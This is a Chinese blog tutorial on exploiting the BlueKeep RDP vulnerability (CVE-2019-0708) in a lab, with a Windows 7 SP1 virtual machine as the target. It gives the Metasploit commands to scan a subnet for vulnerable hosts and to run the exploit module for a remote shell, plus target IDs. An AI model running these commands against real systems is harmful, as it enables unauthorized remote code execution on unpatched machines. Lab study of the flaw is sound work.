漏洞介绍
2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。
从微软官方的消息一出,各大安全厂商都开始发布了漏洞预警,那段时间我也一直在找对应的POC,但要不就是不能利用的POC,要不就是利用以前漏洞写的POC,更有甚着点击attack后给你惊喜。
靶场环境
漏洞环境,我当时就是虚拟机装了Windows7 SP1的系统,
- 001使用VM安装Windows7 SP1模拟受害机
Windows7 SP1下载链接(这里的靶机是使用清水表哥提供的win7sp1的系统):
迅雷下载
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/云盘下载:
Windows7 X64下载链接:链接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx
002 msf配置
下载cve_2019_0708_bluekeep_rce.rb
到msf的配置文件/usr/share/metasploit-framework/modules/exploits/windows/rdp
扫描存在漏洞的主机
msfconsole search 0708 #扫描可用模块 use auxiliary/scanner/rdp/cve_2019_0708_bluekeep #加载扫描模块 set RHOSTS 192.168.1.1/24 #设置扫描地址池 run
如图,可以扫描到当前网段有设备192.168.1.8
存在该漏洞。漏洞利用
利用msf攻击
在利用msf攻击时,需要注意配置
RHOSTS
和target
这两个参数
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 192.168.1.8
set target 2 (当前靶机为虚拟机安装的win7)
run
成功得到shell
target参数
Exploit target:
Id Name
-- ----
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
版权属于:逍遥子大表哥
本文链接:https://blog.bbskali.cn/1378.html
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
此处评论已关闭